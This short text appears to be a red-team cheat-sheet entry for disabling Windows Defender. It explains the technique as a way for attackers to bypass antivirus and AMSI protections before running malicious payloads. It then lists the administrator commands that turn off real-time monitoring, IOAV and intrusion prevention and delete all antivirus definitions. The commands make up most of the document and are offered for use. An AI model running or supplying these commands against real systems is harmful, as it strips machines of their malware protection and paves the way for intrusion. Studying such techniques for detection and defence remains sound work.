This technique disables Windows Defender’s real-time protection, removes antivirus definitions, and turns off additional security features. Attackers use this to bypass Windows Defender (AV) and AMSI protections, allowing execution of malicious payloads without interference. This command requires to be Administrator.
Command:Set-MPPreference -DisableRealTimeMonitoring $true
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Get-MPPreference
Set-MPPreference -DisableIOAVProtection $true
Set-MPPreference -DisableIntrusionPreventionSystem $true